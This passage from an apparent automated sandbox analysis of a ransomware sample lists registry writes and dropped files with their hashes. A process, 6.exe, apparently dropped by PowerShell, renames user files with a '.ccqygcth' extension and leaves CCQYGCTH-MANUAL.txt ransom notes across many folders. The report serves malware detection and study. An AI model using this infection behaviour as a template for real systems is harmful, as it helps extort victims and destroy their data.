HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
FileTracingMask
4294901760
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
ConsoleTracingMask
4294901760
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
MaxFileSize
1048576
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
FileDirectory
%windir%\tracing
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
EnableFileTracing
0
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
EnableConsoleTracing
0
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
FileTracingMask
4294901760
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
ConsoleTracingMask
4294901760
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
MaxFileSize
1048576
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
FileDirectory
%windir%\tracing
2804
6.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2804
6.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000003000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2804
6.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
DefaultConnectionSettings
46000000020000000900000000000000000000000000000004000000000000000092EC1137DAD401000000000000000000000000020000001700000000000000FE80000000000000A179B3FF019923140B00000024EF6F1C24EF6F1C0000000000000000040000000000000048EF6F1C04000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF0300000000000000020000000100000002000000C0A864600000000000000000DADADADA0000000000000000050000000000000000000000A0E41B00000000000000000000000000C0EF6F1CC0EF6F1C0000000000000000FFFFFFFF00000000000000000000000000000000E4EF6F1CE4EF6F1C00000000F0EF6F1CF0EF6F1C00000000000000000000000000000000
2804
6.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
WpadLastNetwork
2804
6.exe
write
HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Blob
040000000100000010000000410352DC0FF7501B16F0028EBA6F45C50F00000001000000140000005BCAA1C2780F0BCB5A90770451D96F38963F012D090000000100000042000000304006082B0601050507030406082B0601050507030106082B0601050507030206082B06010505070308060A2B0601040182370A0304060A2B0601040182370A030C6200000001000000200000000687260331A72403D909F105E69BCF0D32E1BD2493FFC6D9206D11BCD67707390B000000010000001E000000440053005400200052006F006F0074002000430041002000580033000000140000000100000014000000C4A7B1A47B2C71FADBE14B9075FFC415608589101D00000001000000100000004558D512EECB27464920897DE7B66053030000000100000014000000DAC9024F54D8F6DF94935FB1732638CA6AD77C131900000001000000100000006CF252FEC3E8F20996DE5D4DD9AEF42420000000010000004E0300003082034A30820232A003020102021044AFB080D6A327BA893039862EF8406B300D06092A864886F70D0101050500303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F74204341205833301E170D3030303933303231313231395A170D3231303933303134303131355A303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F7420434120583330820122300D06092A864886F70D01010105000382010F003082010A0282010100DFAFE99750088357B4CC6265F69082ECC7D32C6B30CA5BECD9C37DC740C118148BE0E83376492AE33F214993AC4E0EAF3E48CB65EEFCD3210F65D22AD9328F8CE5F777B0127BB595C089A3A9BAED732E7A0C063283A27E8A1430CD11A0E12A38B9790A31FD50BD8065DFB7516383C8E28861EA4B6181EC526BB9A2E24B1A289F48A39E0CDA098E3E172E1EDD20DF5BC62A8AAB2EBD70ADC50B1A25907472C57B6AAB34D63089FFE568137B540BC8D6AEEC5A9C921E3D64B38CC6DFBFC94170EC1672D526EC38553943D0FCFD185C40F197EBD59A9B8D1DBADA25B9C6D8DFC115023AABDA6EF13E2EF55C089C3CD68369E4109B192AB62957E3E53D9B9FF0025D0203010001A3423040300F0603551D130101FF040530030101FF300E0603551D0F0101FF040403020106301D0603551D0E04160414C4A7B1A47B2C71FADBE14B9075FFC41560858910300D06092A864886F70D01010505000382010100A31A2C9B17005CA91EEE2866373ABF83C73F4BC309A095205DE3D95944D23E0D3EBD8A4BA0741FCE10829C741A1D7E981ADDCB134BB32044E491E9CCFC7DA5DB6AE5FEE6FDE04EDDB7003AB57049AFF2E5EB02F1D1028B19CB943A5E48C4181E58195F1E025AF00CF1B1ADA9DC59868B6EE991F586CAFAB96633AA595BCEE2A7167347CB2BCC99B03748CFE3564BF5CF0F0C723287C6F044BB53726D43F526489A5267B758ABFE67767178DB0DA256141339243185A2A8025A3047E1DD5007BC02099000EB6463609B16BC88C912E6D27D918BF93D328D65B4E97CB15776EAC5B62839BF15651CC8F677966A0A8D770BD8910B048E07DB29B60AEE9D82353510

Files activity

Executable files
1
Suspicious files
431
Text files
320
Unknown types
17

Dropped files

PID
Process
Filename
Type
2196
powershell.exe
C:\windows\temp\6.exe
executable
MD5: 25dc3086de8bdd780b89b0a7cd9d51bb
SHA256: c50167d9a899572e7dba0da1d80e3b9a94b2d3803a8f125119097ed5f92add6d
3352
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRDE5B.tmp.cvr
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Videos\Sample Videos\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.ccqygcth
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Recorded TV\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.ccqygcth
binary
MD5: 8e4001efb91d9770e34aba484a181fe4
SHA256: 897191c8f0dfbe3117d5d358351000481ff3686414747a93b7329843202931e3
2804
6.exe
C:\Users\Public\Recorded TV\Sample Media\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.ccqygcth
binary
MD5: 9c9c542e40bca15c638fbad311f31167
SHA256: d157bbdb77250e16cabb24dc922f5d8288fa62bda75ff51f7d03b0d9619487ae
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.ccqygcth
binary
MD5: 3592a6948f625ec8a29abecee9ead84b
SHA256: 1379402dfbf81f99abde163439222b3db2c83db5d92640b3c947ba4110af2df1
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.ccqygcth
binary
MD5: 049ac3d2b5e18d59986ca3d7e34fae23
SHA256: efa49038fafeba4040a9581f2bcb052c9b282e6fde2158a176346c0f999986f7
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.ccqygcth
binary
MD5: 44d692d3dffc03d6d1131036b0c8a22f
SHA256: 9847e46f8403f4a4d9c17fd2f07479f02d74d16ecfde9d39b1dc330a0710a758
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.ccqygcth
binary
MD5: 2099b47347eef7de9fbefc7765c4b85c
SHA256: f3a6cbf7a0c08395f8a06d3b9b565b11dc8be8bd203e2f4e061b12399edae6ab
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.ccqygcth
binary
MD5: df2b418a61ad8928b9eed49621bf8866
SHA256: 120387c2c3d7c031b2d2962faf5c44f53958a271ceb447c18159b57f64830a85
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.ccqygcth
binary
MD5: 21b073fee1f638d048d9e9be39bfe75e
SHA256: f34cb1f0eb0d8524c6719e4f678bc62b3f93dbb765e28c13c9c680a18e4836a8
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Pictures\Sample Pictures\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.ccqygcth
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.ccqygcth
binary
MD5: 734e6d53ef472b93765787a40c276fd6
SHA256: 8eaa39acb0cf10156c674ba4ce0abee6a0b6c2e9fa9a672fe81a922505263887
2804
6.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.ccqygcth
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Music\Sample Music\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.ccqygcth
binary
MD5: 9753ec5b34115b64866d1b236d7815e2
SHA256: 4e14958d36a28336da502b84a9061dc5512bb73ab6a654d8b0ad27dd687454bb
2804
6.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Public\Favorites\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Downloads\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Libraries\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Videos\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Pictures\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Music\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Documents\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Public\Desktop\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\Saved Games\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.ccqygcth
binary
MD5: 819411c73ace15b58cc4a596c879bed6
SHA256: e5bb5d3f1ff1b33e2fd2e8a1750b91841188eca1fa85258ccd1e91e5b7cc8cab
2804
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.ccqygcth
flc
MD5: 2c90e4fdc6d1790de8f6f0243af46bba
SHA256: c14957ff496844f3d723aebf173ab9c6dd0141a684392a2df32f289693f0dd20
2804
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.ccqygcth
binary
MD5: 34b07d797b3a859d74f2e8513ee12ff1
SHA256: 4dd1552d31fa90a314c00607030e9815867e8b390e76fb21b0e8c731bff6076e
2804
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Default\NTUSER.DAT.LOG1.ccqygcth
binary
MD5: 74d318da8bc13c9fc45bbb2bfb2c751f
SHA256: f703d25a7838855e3a34162e3c8f2a50c0653a28ba6c9cc7389f1ee1a08d05dc
2804
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\NTUSER.DAT.LOG1
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Default\Videos\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\Pictures\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\Downloads\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\Links\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\Favorites\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\Desktop\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Local\Temp\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\Media Center Programs\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\Documents\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\Music\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Local\Microsoft\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Local\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Default\AppData\Local\Microsoft\Windows\History\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Searches\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\SendTo\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Saved Games\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\ntuser.ini.ccqygcth
binary
MD5: 21d7dee0aa9b632a8238495a53bd585f
SHA256: 5c48eace3f6250bb667297bf307dcfee8505446f674c7ba9128a68c003fe8d16
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\ntuser.ini
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.ccqygcth
binary
MD5: 41e4629d62972189208176a82e127cd7
SHA256: bbd886d6fcd8b7625679d5fbc4dcb906457c17c019d4c49b15f1fb00a7ff1819
2804
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.ccqygcth
binary
MD5: 79359c821f5c93b39c0ef21674765475
SHA256: 9f138e3a7d50f47986aa309242b04b0ff97910ecca173979bb224747a2fa2c72
2804
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\ntuser.dat.LOG1.ccqygcth
binary
MD5: 9a78fc5d657d74c3ec68653dabba61b7
SHA256: ea839e967f6ab57a896770875de6b40aa885cf2f4d29ba3a91f4dca997e50203
2804
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.ccqygcth
binary
MD5: 9a55767eb49933e4d9b58a5fdeca7faa
SHA256: 7d91a4ba8a57f746470dfc1f0db7fd90555bcd22838a49904665771639b55f4d
2804
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\ntuser.dat.LOG1
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Links\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Mail.url.ccqygcth
binary
MD5: 3203bcdec695b73a93efc61e06fbd51d
SHA256: 78cf01cd47838789b939f8c563bf7af6bccdb40df5b3e4d1e47262b4869682ec
2804
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Spaces.url.ccqygcth
binary
MD5: f1b3fca0f46a42d005429aeb1a23a568
SHA256: b28fc3f4b3381ee649c1f53d2b1a864deb4de1a80d2240518a1c8576afb900f4
2804
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Gallery.url.ccqygcth
binary
MD5: 28cc9f45a27907e0ae2ed893f44bd014
SHA256: 83947306b5654931e175679586737f0d0d1c65211965d7b2546a59047c0e140b
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Network Shortcuts\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\Windows Live\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN.url.ccqygcth
binary
MD5: 5f05391e5eda20a2dbe83904ff55e4ba
SHA256: 72b9ae567e234e16133c7342d0040c5821cd4ba7165f7e04e1454a9cdfa125cb
2804
6.exe
C:\Users\Administrator\Favorites\Windows Live\Get Windows Live.url.ccqygcth
binary
MD5: ff3862c2497962cf3247ad1a52780c6e
SHA256: 12877c696251ac1f568211869d9d4892e73a87ae8ba54e9904aab407dd3b5638
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Sports.url.ccqygcth
binary
MD5: e27f9da84bbecb4e8bac9e5c53353635
SHA256: 2cd9ecad30dba2916ca0f50571e37f9f4ed4d027aee0aabf92d04658f353734f
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSNBC News.url.ccqygcth
binary
MD5: 34c93db5feb64987dec9c4c184a0e7c0
SHA256: d0602d513f2880937174515a73ae9935d97a4bcf6628e2a1330409a9765a9c5b
2804
6.exe
C:\Users\Administrator\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Entertainment.url.ccqygcth
binary
MD5: 5644923e32cf8fa1706443dbf18e6f36
SHA256: f4906257a9feefb985fb583f72ccd671ceefb050d0d89f31d953a8658482dca0
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Money.url.ccqygcth
binary
MD5: 0b34849ad969807380878fec81630637
